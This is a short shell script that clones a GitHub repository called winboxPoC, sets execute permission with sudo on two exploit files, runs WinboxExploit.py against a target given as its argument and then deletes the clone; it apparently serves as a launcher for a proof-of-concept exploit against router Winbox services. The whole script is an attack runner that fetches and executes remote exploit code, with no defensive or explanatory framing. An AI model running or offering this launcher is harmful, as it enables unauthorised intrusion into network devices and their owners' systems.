#! /bin/sh

winboxPoC="https://github.com/BasuCert/winboxPoC"

cd ~/

# Download the repo
echo Downloading...
git clone $winboxPoC
echo Downloaded!

# Get execution permission on repo's files

cd ~/winboxPoC

echo Setting execution permission... 

sudo chmod +x MACServerDiscover.py
sudo chmod +x MACServerExploit.py

echo Permission Setted!

# Execute the exploit

python3 WinboxExploit.py $1

rm -rf ~/winboxPoC
